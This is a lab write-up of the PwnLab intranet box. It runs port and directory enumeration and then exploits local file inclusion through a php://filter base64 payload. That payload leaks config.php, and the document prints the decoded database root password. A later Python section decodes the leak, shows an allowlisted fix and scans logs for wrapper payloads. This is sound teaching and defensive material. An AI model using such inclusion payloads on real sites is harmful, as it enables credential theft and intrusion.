Pwned Date - 10th August 2022

Enumeration

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33723/tcp   status
|   100024  1          34953/udp   status
|   100024  1          56543/udp6  status
|_  100024  1          57090/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 46
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolOld, DontAllowDatabaseTableColumn, Support41Auth, SupportsTransactions, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsCompression, ODBCClient, IgnoreSpaceBeforeParenthesis, FoundRows, LongColumnFlag, ConnectWithDatabase, LongPassword, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: -`zelog9%M6dvE5vvl;#
|_  Auth Plugin Name: mysql_native_password
33723/tcp open  status  1 (RPC #100024)


Fuzzing the web directories with gobuster finds /config.php, but it comes back blank (size 0):

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.234.29 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php
/.hta                 (Status: 403) [Size: 293]
/.htpasswd.php        (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 298]
/.htaccess.php        (Status: 403) [Size: 302]
/.htpasswd            (Status: 403) [Size: 298]
/.hta.php             (Status: 403) [Size: 297]
/config.php           (Status: 200) [Size: 0]
/images               (Status: 301) [Size: 317] [--> http://192.168.234.29/images/]
/index.php            (Status: 200) [Size: 332]
/index.php            (Status: 200) [Size: 332]
/login.php            (Status: 200) [Size: 250]
/server-status        (Status: 403) [Size: 302]
/upload               (Status: 301) [Size: 317] [--> http://192.168.234.29/upload/]
/upload.php           (Status: 200) [Size: 19]

We tried logging in with default credentials, but were redirected to

<http://192.168.234.29/?page=login>

Exploitation

Recall the File Inclusion module in HackTheBox Academy, which describes an interesting Local File Inclusion method: wrapping the included file in php://filter with convert.base64-encode makes the server return the file's source base64-encoded instead of executing it, so we can read the file we want:

<http://www.somesite.com/?page=php://filter/convert.base64-encode/resource=in.php>

So we tried the same payload against the page parameter here:

<http://192.168.234.29/?page=php://filter/convert.base64-encode/resource=config>

Indeed, the response contained this string:


PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+

After base64-decoding it we get the contents of config.php, including database credentials:

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
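As an added example (not code from the original writeup), the Python below works through the php://filter trick described above from the other side of the table. It decodes the base64 string the wrapper returned and pulls the credential assignments out of the recovered config.php; it mirrors the assumed shape of the vulnerable include (the application appends .php to the page parameter, which is the assumption behind the payload using resource=config rather than config.php) next to an allowlisted resolver that refuses wrapper strings; and it scans constructed Apache access-log lines for any parameter that, after URL decoding, begins with a PHP stream wrapper, which is the request signature a defender would alert on. The log lines and the ALLOWED_PAGES set are assumptions built from the gobuster output on this page.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The base64 string recovered on this page via php://filter/convert.base64-encode.
PAGE_B64 = (
    "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0K"
    "JHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+"
)

# Constructed Apache access-log lines (not from the original page) for the detector.
# Line 3 is double URL-encoded to show why the scanner decodes twice.
SAMPLE_LOG = """\
192.168.234.5 - - [10/Aug/2022:10:01:02 +0000] "GET /?page=login HTTP/1.1" 200 250
192.168.234.5 - - [10/Aug/2022:10:01:09 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 412
192.168.234.5 - - [10/Aug/2022:10:01:15 +0000] "GET /?page=%2570hp%253A%252F%252Ffilter%252Fresource%253Dindex HTTP/1.1" 200 600
192.168.234.5 - - [10/Aug/2022:10:01:20 +0000] "GET /images/logo.png HTTP/1.1" 200 4821
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# PHP stream wrappers that have no business appearing in a path-like parameter.
WRAPPER_RE = re.compile(
    r"^\s*(php|data|expect|phar|zip|glob|compress\.(?:zlib|bzip2))://", re.IGNORECASE
)
# Assumed allowlist, taken from the page names gobuster found on this host.
ALLOWED_PAGES = {"index", "login", "upload"}
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')


def decode_filter_output(b64_text):
    """Decode what php://filter/convert.base64-encode returned: the raw PHP source."""
    return base64.b64decode(b64_text).decode("utf-8")


def php_assignments(source):
    """Collect simple $name = "value"; assignments from a PHP config (audit for plaintext secrets)."""
    return dict(ASSIGN_RE.findall(source))


def resolve_page_unsafe(page):
    """Assumed shape of the vulnerable include: the extension is appended to user input unchecked."""
    return page + ".php"


def resolve_page_safe(page):
    """Hardened resolver: only a known page name reaches include(); wrappers and paths are rejected."""
    if page in ALLOWED_PAGES:
        return page + ".php"
    return None


def parameter_values(target):
    """Yield (name, value) for each query parameter, decoding a second time to catch double encoding."""
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs already decoded once
            yield name, unquote(value)


def find_wrapper_requests(log_text):
    """Return (target, param, decoded_value) for every request carrying a PHP stream wrapper."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        for name, value in parameter_values(target):
            if WRAPPER_RE.match(value):
                hits.append((target, name, value))
    return hits


if __name__ == "__main__":
    for target, name, value in find_wrapper_requests(SAMPLE_LOG):
        print(f"wrapper in parameter {name!r}: {value}  ({target})")
    source = decode_filter_output(PAGE_B64)
    print(php_assignments(source))
    print(resolve_page_safe("php://filter/convert.base64-encode/resource=config"))  # None
```

The detector keys on the wrapper prefix rather than on the literal string convert.base64-encode, because the same `page` parameter would also be abused through data:, expect: or phar: wrappers; the allowlisted resolver is the fix on the application side, since no amount of string filtering on `include($_GET['page'] . '.php')` is as simple to reason about as a fixed set of page names.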